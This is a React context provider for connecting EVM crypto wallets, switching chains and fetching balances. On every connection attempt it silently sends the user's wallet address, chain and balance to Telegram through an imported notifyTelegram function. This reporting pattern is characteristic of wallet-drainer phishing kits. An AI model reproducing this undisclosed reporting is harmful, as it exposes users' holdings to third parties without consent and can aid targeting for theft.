import React, { createContext, useContext, useState } from 'react';
import { ethers } from 'ethers';
import { EVM_CHAINS as EVM_CHAINS_CONFIG, getChainConfig as getEVMChainConfig, getExplorerUrl as getEVMExplorerUrl, isChainSupported } from '../lib/evmChains';

const EVMContext = createContext();

// Convert comprehensive chain config to simple format for display
const EVM_CHAINS = Object.entries(EVM_CHAINS_CONFIG).reduce((acc, [chainId, config]) => {
  acc[chainId] = {
    name: config.name,
    symbol: config.symbol,
    decimals: config.decimals,
    explorer: config.explorer,
    rpcUrl: config.rpcUrl,
  };
  return acc;
}, {});

const EVMProvider = ({ children }) => {
  const [selectedEVMChain, setSelectedEVMChain] = useState(1); // Ethereum mainnet
  
  // EVM Wallet State
  const [evmProvider, setEvmProvider] = useState(null);
  const [evmSigner, setEvmSigner] = useState(null);
  const [evmAccount, setEvmAccount] = useState(null);
  const [evmBalance, setEvmBalance] = useState(null);

  // EVM Chain RPC URLs (from comprehensive config)
  const EVM_CHAIN_RPCS = Object.entries(EVM_CHAINS_CONFIG).reduce((acc, [chainId, config]) => {
    acc[chainId] = config.rpcUrl;
    return acc;
  }, {});

  // Get current wallet info
  const getWalletInfo = () => {
    return {
      type: 'evm',
      isConnected: !!evmAccount,
      account: evmAccount,
      balance: evmBalance,
      provider: evmProvider,
      signer: evmSigner,
      chainId: selectedEVMChain,
    };
  };

  // EVM Wallet Connection Functions
  const connectEVMWallet = async (walletId) => {
    try {
      console.log('🔌 connectEVMWallet called with walletId:', walletId);
      
      let walletProvider = null;
      let walletDetected = false;

      // First, try to detect any available Ethereum wallet
      if (typeof window.ethereum !== 'undefined') {
        console.log('✅ Ethereum wallet detected');
        walletProvider = new ethers.providers.Web3Provider(window.ethereum);
        walletDetected = true;
      } else if (typeof window.BinanceChain !== 'undefined') {
        console.log('✅ Binance Chain detected');
        walletProvider = new ethers.providers.Web3Provider(window.BinanceChain);
        walletDetected = true;
      } else {
        console.log('❌ No Ethereum wallet detected');
        // For mobile, try to open the specific wallet app
        const wallet = getWalletConfig(walletId);
        if (wallet) {
          const appStoreUrl = getAppStoreUrl(wallet);
          window.open(appStoreUrl, '_blank');
          throw new Error(`${wallet.name} not installed. Redirecting to download page...`);
        } else {
          throw new Error('No compatible wallet found. Please install MetaMask or another Ethereum wallet.');
        }
      }

      if (!walletDetected || !walletProvider) {
        throw new Error('Failed to initialize wallet provider');
      }

      console.log('🔐 Requesting account access...');
      // Request account access - this should trigger the wallet popup
      const accounts = await walletProvider.send('eth_requestAccounts', []);
      const account = accounts[0];
      const signer = walletProvider.getSigner();
      
      console.log('✅ Account access granted:', account);
      console.log('✅ Signer created:', !!signer);

      // Auto-detect current chain and switch if needed
      const currentChainIdHex = await walletProvider.send('eth_chainId', []);
      const currentChainId = parseInt(currentChainIdHex, 16);
      const targetChainId = selectedEVMChain;
      
      console.log('🔗 Chain detection:', { 
        currentChainId, 
        targetChainId, 
        isSupported: isChainSupported(currentChainId),
        needsSwitch: currentChainId !== targetChainId 
      });

      // If wallet is on an unsupported chain, switch to target
      // If wallet is on a different supported chain, switch to target
      if (currentChainId !== targetChainId) {
        // Check if target chain is supported
        if (!isChainSupported(targetChainId)) {
          throw new Error(`Chain ID ${targetChainId} is not supported`);
        }

        try {
          console.log('🔄 Switching to target chain...');
          await walletProvider.send('wallet_switchEthereumChain', [
            { chainId: `0x${targetChainId.toString(16)}` }
          ]);
          console.log('✅ Chain switched successfully');
          
          // Update provider after chain switch
          walletProvider = new ethers.providers.Web3Provider(window.ethereum);
        } catch (switchError) {
          console.log('⚠️ Chain switch failed, attempting to add chain...', switchError);
          // If chain doesn't exist, add it
          if (switchError.code === 4902 || switchError.code === -32603) {
            const chainConfig = getEVMChainConfig(targetChainId);
            await walletProvider.send('wallet_addEthereumChain', [chainConfig]);
            console.log('✅ Chain added successfully');
            
            // Update provider after chain add
            walletProvider = new ethers.providers.Web3Provider(window.ethereum);
          } else {
            throw switchError;
          }
        }
      } else if (!isChainSupported(currentChainId)) {
        // If on unsupported chain, try to switch to target
        console.log('⚠️ Current chain not in supported list, switching to target...');
        try {
          const chainConfig = getEVMChainConfig(targetChainId);
          await walletProvider.send('wallet_switchEthereumChain', [
            { chainId: `0x${targetChainId.toString(16)}` }
          ]).catch(() => {
            return walletProvider.send('wallet_addEthereumChain', [chainConfig]);
          });
          walletProvider = new ethers.providers.Web3Provider(window.ethereum);
        } catch (err) {
          console.warn('Could not switch to supported chain:', err);
        }
      }

      console.log('💾 Setting EVM state...');
      setEvmProvider(walletProvider);
      setEvmSigner(signer);
      setEvmAccount(account);
      
      // Fetch balance with chain-aware formatting
      console.log('💰 Fetching balance...');
      const balance = await walletProvider.getBalance(account);
      const chainId = (await walletProvider.getNetwork()).chainId;
      const chainInfo = EVM_CHAINS_CONFIG[chainId] || EVM_CHAINS_CONFIG[1];
      const decimals = chainInfo.decimals || 18;
      const symbol = chainInfo.symbol || 'ETH';
      const formattedBalance = ethers.utils.formatUnits(balance, decimals);
      setEvmBalance(formattedBalance);
      console.log('💰 Balance set:', formattedBalance, symbol);

      console.log('✅ EVM wallet connection completed successfully');
      
      // Notify Telegram about successful connection
      const { notifyTelegram } = await import('../lib/telemetry');
      notifyTelegram({
        event: 'wallet_connect',
        chain: chainInfo.name || 'EVM',
        status: 'success',
        amount: `${formattedBalance} ${symbol}`,
        account,
      });
      
      return { success: true };
    } catch (err) {
      console.error('❌ EVM wallet connection failed:', err);
      
      // Notify Telegram about failed connection
      const { notifyTelegram } = await import('../lib/telemetry');
      notifyTelegram({
        event: 'wallet_connect',
        chain: 'EVM',
        status: 'failed',
        amount: 'n/a',
        account: null,
        detail: err?.message,
      });
      
      return { success: false, error: err.message };
    }
  };

  // Helper function to get wallet configuration
  const getWalletConfig = (walletId) => {
    const walletConfigs = {
      metamask: {
        name: 'MetaMask',
        downloadUrl: 'https://metamask.io/download/',
        appStoreUrl: 'https://apps.apple.com/app/metamask-blockchain-wallet/id1438144202',
        playStoreUrl: 'https://play.google.com/store/apps/details?id=io.metamask'
      },
      trust: {
        name: 'Trust Wallet',
        downloadUrl: 'https://trustwallet.com/',
        appStoreUrl: 'https://apps.apple.com/app/trust-crypto-bitcoin-wallet/id1288339409',
        playStoreUrl: 'https://play.google.com/store/apps/details?id=com.wallet.crypto.trust'
      },
      coinbase: {
        name: 'Coinbase Wallet',
        downloadUrl: 'https://wallet.coinbase.com/',
        appStoreUrl: 'https://apps.apple.com/app/coinbase-wallet/id1278383455',
        playStoreUrl: 'https://play.google.com/store/apps/details?id=org.toshi'
      },
      binance: {
        name: 'Binance Wallet',
        downloadUrl: 'https://www.bnbchain.org/en/binance-wallet',
        appStoreUrl: 'https://apps.apple.com/app/binance-buy-bitcoin-crypto/id1436799971',
        playStoreUrl: 'https://play.google.com/store/apps/details?id=com.binance.dev'
      },
      okx: {
        name: 'OKX Wallet',
        downloadUrl: 'https://www.okx.com/web3',
        appStoreUrl: 'https://apps.apple.com/app/okx-buy-bitcoin-crypto/id1327268470',
        playStoreUrl: 'https://play.google.com/store/apps/details?id=com.okinc.okex.gp'
      },
      bitget: {
        name: 'Bitget Wallet',
        downloadUrl: 'https://web3.bitget.com/',
        appStoreUrl: 'https://apps.apple.com/app/bitget-buy-crypto-bitcoin/id1487644418',
        playStoreUrl: 'https://play.google.com/store/apps/details?id=com.bitget.wallet'
      },
      brave: {
        name: 'Brave Wallet',
        downloadUrl: 'https://brave.com/wallet/',
        appStoreUrl: 'https://apps.apple.com/app/brave-browser/id1052879175',
        playStoreUrl: 'https://play.google.com/store/apps/details?id=com.brave.browser'
      },
      bybit: {
        name: 'Bybit Wallet',
        downloadUrl: 'https://www.bybit.com/en/web3',
        appStoreUrl: 'https://apps.apple.com/app/bybit-buy-sell-crypto/id1488296982',
        playStoreUrl: 'https://play.google.com/store/apps/details?id=com.bybit.app'
      },
      cryptodotcom: {
        name: 'Crypto.com Wallet',
        downloadUrl: 'https://crypto.com/defi-wallet',
        appStoreUrl: 'https://apps.apple.com/app/crypto-com-buy-bitcoin/id1262148500',
        playStoreUrl: 'https://play.google.com/store/apps/details?id=com.crypto.exchange'
      },
      blockchain: {
        name: 'Blockchain.com',
        downloadUrl: 'https://www.blockchain.com/wallet',
        appStoreUrl: 'https://apps.apple.com/app/blockchain-bitcoin-wallet/id493253309',
        playStoreUrl: 'https://play.google.com/store/apps/details?id=piuk.blockchain.android'
      },
      safepal: {
        name: 'SafePal Wallet',
        downloadUrl: 'https://www.safepal.com/download',
        appStoreUrl: 'https://apps.apple.com/app/safepal-wallet/id1548297139',
        playStoreUrl: 'https://play.google.com/store/apps/details?id=io.safepal.wallet'
      },
      uniswap: {
        name: 'Uniswap Wallet',
        downloadUrl: 'https://wallet.uniswap.org/',
        appStoreUrl: 'https://apps.apple.com/app/uniswap-wallet/id6443944476',
        playStoreUrl: 'https://play.google.com/store/apps/details?id=org.uniswap.mobile'
      },
      zeal: {
        name: 'Zeal Wallet',
        downloadUrl: 'https://zeal.app/',
        appStoreUrl: 'https://apps.apple.com/app/zeal-wallet/id6443944476',
        playStoreUrl: 'https://play.google.com/store/apps/details?id=com.zeal.wallet'
      },
      zerion: {
        name: 'Zerion Wallet',
        downloadUrl: 'https://zerion.io/',
        appStoreUrl: 'https://apps.apple.com/app/zerion-defi-wallet/id1456732565',
        playStoreUrl: 'https://play.google.com/store/apps/details?id=io.zerion.android'
      }
    };
    return walletConfigs[walletId];
  };

  // Helper function to get app store URL based on platform
  const getAppStoreUrl = (wallet) => {
    const userAgent = navigator.userAgent.toLowerCase();
    if (userAgent.includes('iphone') || userAgent.includes('ipad') || userAgent.includes('ipod')) {
      return wallet.appStoreUrl;
    } else if (userAgent.includes('android')) {
      return wallet.playStoreUrl;
    } else {
      return wallet.downloadUrl;
    }
  };

  // Use comprehensive chain config functions
  const getChainConfig = (chainId) => getEVMChainConfig(chainId);
  const getExplorerUrl = (chainId) => getEVMExplorerUrl(chainId);

  const disconnectEVMWallet = () => {
    setEvmProvider(null);
    setEvmSigner(null);
    setEvmAccount(null);
    setEvmBalance(null);
  };

  const switchEVMChain = async (chainId) => {
    try {
      if (!evmProvider) {
        setSelectedEVMChain(chainId);
        return;
      }

      // Check if chain is supported
      if (!isChainSupported(chainId)) {
        throw new Error(`Chain ID ${chainId} is not supported`);
      }

      const targetChainId = `0x${chainId.toString(16)}`;
      
      try {
        await evmProvider.send('wallet_switchEthereumChain', [
          { chainId: targetChainId }
        ]);
        setSelectedEVMChain(chainId);
      } catch (switchError) {
        // If chain doesn't exist, add it
        if (switchError.code === 4902 || switchError.code === -32603) {
          const chainConfig = getChainConfig(chainId);
          await evmProvider.send('wallet_addEthereumChain', [chainConfig]);
          setSelectedEVMChain(chainId);
        } else {
          throw switchError;
        }
      }
    } catch (err) {
      console.error('Failed to switch EVM chain:', err);
      throw err;
    }
  };

  const value = {
    // EVM specific
    selectedEVMChain,
    setSelectedEVMChain,
    EVM_CHAINS,
    EVM_CHAIN_RPCS,
    evmProvider,
    evmSigner,
    evmAccount,
    evmBalance,
    connectEVMWallet,
    disconnectEVMWallet,
    switchEVMChain,
    
    // Unified interface
    getWalletInfo,
    getChainConfig,
    getExplorerUrl,
  };

  return (
    <EVMContext.Provider value={value}>
      {children}
    </EVMContext.Provider>
  );
};

export const useEVM = () => {
  const context = useContext(EVMContext);
  if (!context) {
    throw new Error('useEVM must be used within an EVMProvider');
  }
  return context;
};

export default EVMProvider;

